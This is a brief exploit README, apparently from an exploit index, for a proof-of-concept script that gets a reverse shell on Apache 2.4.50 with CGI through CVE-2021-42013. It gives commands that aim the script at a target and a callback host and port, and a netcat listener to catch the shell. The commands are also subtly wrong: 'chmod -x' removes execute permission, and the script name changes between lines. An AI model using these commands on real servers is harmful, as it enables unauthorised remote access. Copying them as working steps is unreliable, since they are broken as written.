Share
## https://sploitus.com/exploit?id=8713FD59-264B-5FD7-8429-3251AB5AB3B8
# CVE-2021-42013_Reverse-Shell
PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI
## Usage :

```sh
chmod -x CVE-2021-42013.sh
./CVE-2021-42013_reverseshell.sh http://ip:port/ LHOST LPORT

```
### More info:
```sh
chmod -x CVE-2021-42013.sh
./CVE-2021-42013_reverseshell.sh http://ip:8083 10.0.000.000 9999
 nc -lvnp 9999
 
```


### References
 https://nvd.nist.gov/vuln/detail/CVE-2021-42013
 
 
 
 https://vulners.com/cve/CVE-2021-42013
 
 
 
 https://tryhackme.com/room/cve202141773